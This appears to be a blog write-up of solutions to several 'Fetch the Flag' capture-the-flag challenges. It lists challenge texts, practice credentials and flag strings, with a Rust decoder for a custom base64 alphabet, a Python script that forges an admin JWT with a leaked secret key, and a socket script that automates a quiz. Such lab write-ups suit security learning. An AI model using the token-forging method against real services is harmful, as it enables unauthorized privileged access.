CTF Fetch the Flag

ValerieTafur
Oct 28, 2023

Finders Keepers

Patch found a flag! He stored it in his home directory… should be able to keep it?

Connect with:

# Password is "userpass"
ssh -p 30723 user@challenge.ctf.games

Solution:

I connected to the machine and then I used the following command to get the flag:

Answer: flag{e4bd38e78379a5a0b29f047b91598add}

Nine-One-Sixteen

We found a vulnerability in this company’s software and we are trying to do responsible disclosure! We want to notify the organization and contact them about the security issues… can you track down their contact info?

Connect with:

Solution:

To find the organization's contact info, we go to the site's well-known security.txt file.

Link:

http://challenge.ctf.games:31512/.well-known/security.txt

Answer: flag{7b2bf7ec022acbddb0a75a362f4ce8ff}

Rusty

We heard you were a bit rusty on the basics… so here’s a small warmups challenge for you!

Here’s some code attached and its output. Can you make any sense of it?

OPhMOnVheP1hRaOa1Pmi1GrBbGm21PRaepxXOPxMeG1iOaYd1ji=

Solution:

To solve this exercise, I used the following code:

// Custom alphabet used by the challenge's encoder in place of the standard base64 table.
const CHARSET: &[u8] = b"QWlKoxp3mT9EeRb4YzgG6rNj1OLvZ5SDfMBaXtP8JyIFVH07uh2wicdnUAC#@q";

fn main() {
    let output = "OPhMOnVheP1hRaOa1Pmi1GrBbGm21PRaepxXOPxMeG1iOaYd1ji=";

    // Map each character back to its 6-bit index in CHARSET and expand it
    // to bits, most significant bit first. '=' is padding and is skipped.
    let mut input = Vec::new();

    for &byte in output.as_bytes() {
        if byte != b'=' {
            let position = CHARSET.iter().position(|&x| x == byte).unwrap() as u32;
            for shift in (0..6).rev() {
                input.push(((position >> shift) & 1) as u8);
            }
        }
    }

    // Regroup the bit stream into 8-bit bytes; leftover bits are dropped.
    let mut output = Vec::new();

    let mut temp = 0u8;
    let mut temp_len = 0u8;

    for &bit in &input {
        temp = (temp << 1) | bit;
        temp_len += 1;
        if temp_len == 8 {
            output.push(temp);
            temp = 0;
            temp_len = 0;
        }
    }

    let out = String::from_utf8(output).unwrap();

    println!("{}", out);
}

Answer: flag{12f166cbb4a5b922bcc0adfaa164f46a}

Jott

Jott is the new hottness of productivity applications! Collaborate in real time, share notes, take notes, or don’t take notes! We’re not your manager. We’re not even a real company!

Go ahead and pentest the application and jott down whatever you find.

We’d like you to do a pretty thorough job, so we’ve outfitted you with a dev instance of the app. Please use these user level credentials to log in and perform an authenticated test.

Username: john_doe
Password: password123

We also gave you the dev-build of the app in the src directory for reference.

Solution:

To get the token of the website I used the following code:

import jwt

# Define the known SECRET_KEY
SECRET_KEY = "jott123!"
# Craft a token with an 'admin' role
payload = {"sub": "admin", "role": "admin"}
# Create a forged JWT token using the known SECRET_KEY
forged_token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
# Print the forged token
print(forged_token)

Then, I modified the JWT value with the value we generated:

Once we enter as an admin, we can get the flag:

Answer: flag{c7cc7fa86330cff2c09cea0055289b7e}

Quick Maths

To try and get better grades in math, I made a program that gave me timed quizzes. Funny thing is that as I got better at the questions in this test, I got worse grades on my math tests.

NOTE: Float answers are rounded to 1 decimal point.
NOTE: And here’s another twist… the answers to division questions depend on integer division or double division. I.e.,
3/5 = 0
3/5.0 = .6

Solution:

To solve this exercise, we need to use the following code:

import socket

HOST = 'challenge.ctf.games'
PORT = 32287

def solve_math_question(question):
    # Expected form: "What is <num1> <operator> <num2>?"
    parts = question.split()
    raw1 = parts[2]
    operator = parts[3]
    raw2 = parts[4].replace('?', '')
    num1 = float(raw1)
    num2 = float(raw2)

    if operator == '/':
        # Integer division only when both operands are written as integers
        # (3/5 = 0); a decimal point on either side means double division
        # (3/5.0 = .6), as the challenge note describes.
        if '.' not in raw1 and '.' not in raw2:
            return str(int(num1 // num2))
        else:
            return str(round(num1 / num2, 1))
    elif operator == '+':
        return str(round(num1 + num2, 1))
    elif operator == '-':
        return str(round(num1 - num2, 1))
    elif operator == '*':
        return str(round(num1 * num2, 1))
    else:
        return "Invalid operator"

def main():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))

        try:
            while True:
                data = s.recv(1024).decode('utf-8')

                # An empty read means the server closed the connection.
                if not data:
                    break

                if "Do you want to give it a chance? (Y/n):" in data:
                    s.send(b'Y\n')
                elif "What is" in data:
                    question = data.strip()
                    answer = solve_math_question(question)
                    s.send(f'{answer}\n'.encode('utf-8'))
                elif "Awesome, good luck!" in data:
                    continue
                elif "flag" in data:
                    print(data)
                    break
                else:
                    if "Wrong!" not in data:
                        print(data)
                    continue
        except KeyboardInterrupt:
            print("Interrupted. Good bye!")

if __name__ == '__main__':
    main()

Then, we run our script:

Answer: flag{77ba0346d9565e77344b9fe40ecf1369}

Back the Hawks

We are Back the Hawks! We’re a non-profit that seeks to protect hawks across the world. We have a vibrant community of Backers who are all passionate about Backing the Hawks! We’d love for you to join us… if you can figure out how to get an access code.

NOTE: any resemblance to other companies, non-profits, services, login portal challenges, and/or the like, living or dead, is completely coincidental.

Hint: The JavaScript of this page is doing something interesting.

Solution:

I examined the website to check the JavaScript code:

According to the JavaScript, I need to make a POST:

Then, I got an encrypted message:

Caesar cipher:

Output: WE_OUT_HERE_BACKIN_THE_HAWKS_2023

Once we get our access code, we can enter the website:

Answer: flag{3ef532159716ecfb9117f56f4ead4fb6}

Unhackable Andy

Someone might want to let ol’ Andy know the old adage — pride goeth before the fall.

Solution:

To solve this exercise, we need to access the login.

The exercise provided us the repository:

After examining it, we can find the credential to access the page:

Once we access the page, we can see a command output:

We only need to do simple Linux commands:

ls

cat flag.txt

Answer: flag{e81b8885d8a5e8d57bbadeb124cc956b}

Protecting Camp

I made a small site to keep a list of things I need to buy to keep me safe before I go camping, maybe it’s keeping some other things safe too!

Psst… Snyk can help solve this challenge! Try it out!

Solution:

We need to find the vulnerability using Snyk:

Then, we checked the code:

This is the vulnerable part of the code that we are going to exploit.

Use Burp Suite:

Modify the request.

Launch the request:

Answer: flag{d716dd8ab70bbc51a5f1d0182c84bcc8}
